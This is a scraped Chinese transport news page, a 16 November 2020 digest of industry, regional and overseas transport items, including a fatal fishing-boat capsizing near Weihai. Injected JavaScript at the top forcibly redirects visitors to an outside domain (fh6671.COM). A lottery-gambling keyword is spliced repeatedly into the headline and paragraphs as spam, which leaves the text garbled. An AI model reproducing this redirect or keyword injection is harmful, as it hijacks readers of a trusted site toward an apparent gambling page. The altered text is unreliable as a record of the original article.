function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 舆情

每日动态20201116丨一渔船在山东威海海域被撞翻扣,已致3人死亡

2020-11-16 16:20:34 来源: 作者:徐月灵

三分彩计划◆◆行业要闻 

→习近平总书记11月14日在南京市主持召开全面推动长江经济带发展座谈会,强调要坚定不移贯彻新发展理念,推动长江经济带高质量发展,构建统一开放有序的运输市场,优化调整运输结构,创新运输组织模式。

三分彩计划→11月13日,交通运输部印发《港口及其一线人员新冠肺炎疫情防控工作指南(第四版)》,明确港口企业、引航机构应及时掌握到港船舶、载货和船员信息,港口企业应加强人员和车辆信息管理、信息报送等。

→11月13日,中国民航局在新闻发布会上表示,10月份,民航完成旅客运输量5032.3万人次,恢复至去年同期的88.3%。同时,全行业完成运输航空飞行93.9万小时,恢复至去年同期的90.1%,环比增长5.5%。

◆◆各地速报

→11月15日,中缅国际铁路中国境内的“最后一段”——大瑞铁路全线首孔T梁成功架设,由此正式进入线上施工阶段,预计2022年开通运营。

→近日,被称为“滑雪旅游专线”的京张高铁自11月17日起将无法携带滑雪板乘坐,引发广泛热议。高铁客服回应是因旅客集中出行需求量大、无充足存放空间,目前正在收集旅客的相关意见,将向有关部门反映。

→11月13日,山东港口青岛港与中车长江集团长江公司在青岛港全自动化集装箱码头举行青岛港集装箱智能空轨集疏运系统合作研发项目签约仪式,标志着全球首创智能空轨集疏运系统将落地山东港口青岛港。

→11月15日,“鲁蓬渔养60515”渔船在山东威海石岛东南8海里处被撞翻扣,5人落水。经救援,北海救助局成功救助1人,打捞3具遗体,1人失踪。

→空中客车11月13日在天津举行仪式,向浙江长龙航空交付了其机队第50架A320系列飞机。此前长龙航空机队共有28架A320和21架A320neo。

三分彩计划→中国邮政寄递事业部信息技术部原总经理戴明坚因利用职务便利非法收受他人财物、非法占有公共财物、私刻事业单位印章,被开除党籍,并收缴其违纪违法所得。

◆◆境外纵览

→11月15日,印度尼西亚雅万高铁7号隧道顺利贯通。这是中国中铁印尼雅万高铁项目首座全线贯通的千米以上隧道。

→西班牙加泰罗尼亚大区近日决定在每列动车上设2到3个“沉默车厢”,该车厢内乘客需自觉保持沉默,来降低传染新冠肺炎的概率。

三分彩计划→11月13日,韩国外交部就三星电子原定于当天飞往西安和天津的两架包机被取消一事表示,中韩两国“快捷通道”依旧保持正常运行,三星包机被取消属于个别未获批案例,韩方将继续就此与中方协调。

◆◆舆 说

新一代的智能交通以及智能交通基础设施是提高我国交通安全和服务水平的重要建设内容,所以列入新基建。而可持续发展要求我们用更宽的眼界考虑未来出行的发展。未来的交通要与社会和经济协调发展,收益和成本比是重要因素。智能道路和智能化运营车辆将是未来五年重要的发展领域,无人驾驶汽车要成为消费品还有很长的路要走。

三分彩计划——中国智能交通产业联盟理事长、国家智能交通系统工程技术研究中心首席科学家王笑京就无人驾驶汽车未来发展问题表示

image.png


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

三分彩计划围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。